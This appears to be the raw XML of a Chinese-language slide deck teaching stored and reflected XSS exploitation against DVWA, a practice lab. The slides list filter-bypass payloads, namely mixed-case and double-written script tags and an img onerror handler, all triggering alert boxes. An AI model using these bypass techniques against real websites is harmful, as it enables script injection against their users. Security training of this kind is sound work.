                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>語法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2600" kern="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6407231"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068579" y="2292112"/>
            <a:ext cx="5651143" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1"/>
              <a:t>ScRipt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>&gt;alert('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t> test3')&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="191785" y="1723093"/>
            <a:ext cx="4686817" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>大小寫混淆繞過</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>的攻擊技術</a:t>
            </a:r>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562" y="3198081"/>
            <a:ext cx="8524875" cy="1962150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3209219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XSS exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26978661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181942"/>
            <a:ext cx="9144000" cy="1307154"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C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輸入一段語法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2600" kern="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6407231"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="314921" y="1736107"/>
            <a:ext cx="5270995" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>試看看上次攻擊是否成功</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>???</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1599451" y="2508712"/>
            <a:ext cx="4954370" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>&lt;script&gt;alert('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t> test1')&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1590742" y="3794190"/>
            <a:ext cx="6507878" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1"/>
              <a:t>sc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1"/>
              <a:t>ript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>&gt;alert('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t> test2')&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1210298" y="3360900"/>
            <a:ext cx="2262158" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>雙寫繞過的攻擊技術</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1659343" y="5185710"/>
            <a:ext cx="5651143" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1"/>
              <a:t>ScRipt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>&gt;alert('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t> test3')&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1184563" y="4613362"/>
            <a:ext cx="3300352" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>大小寫混淆繞過</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>的攻擊技術</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4251467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181942"/>
            <a:ext cx="9144000" cy="1307154"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>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輸入一段語法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2600" kern="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Calibri"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Chrome 61</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" b="1" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Calibri"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" b="1" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Calibri"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>通通擋掉了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" b="1" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Calibri"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>!           </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2600" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6407231"/>
            <a:ext cx="5070389" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>http://www.freebuf.com/articles/web/123779.html</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617850" y="2318817"/>
            <a:ext cx="5651143" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>=alert('test4')&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="280086" y="1622274"/>
            <a:ext cx="8394357" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>無法使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>標籤注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>代碼</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>試看看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>通過</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>等標籤的事件或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>等標籤的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入惡意的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>代碼</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"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77" y="3257403"/>
            <a:ext cx="8694140" cy="2161029"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2786224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Stored XSS exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="6600" dirty="0" smtClean="0"/>
              <a:t>in DVWA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="5400" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="5400" dirty="0"/>
              <a:t>實務</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="5400" dirty="0" smtClean="0"/>
              <a:t>測試</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="5400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="5400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>參考資料</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>http://www.freebuf.com/articles/web/123779.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW"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66085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960379" y="1686803"/>
            <a:ext cx="8029033" cy="4664570"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="標題 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="398079"/>
            <a:ext cx="9144000" cy="763458"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="50000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:body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endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="向右箭號 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5774724"/>
            <a:ext cx="840259" cy="7661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t>點選</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="321867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p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="960379" y="1686803"/>
            <a:ext cx="8029033" cy="4664570"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="標題 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="398078"/>
            <a:ext cx="9144000" cy="1134159"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="50000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:body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br>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2700" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>正常</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2700" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>輸入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2700" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
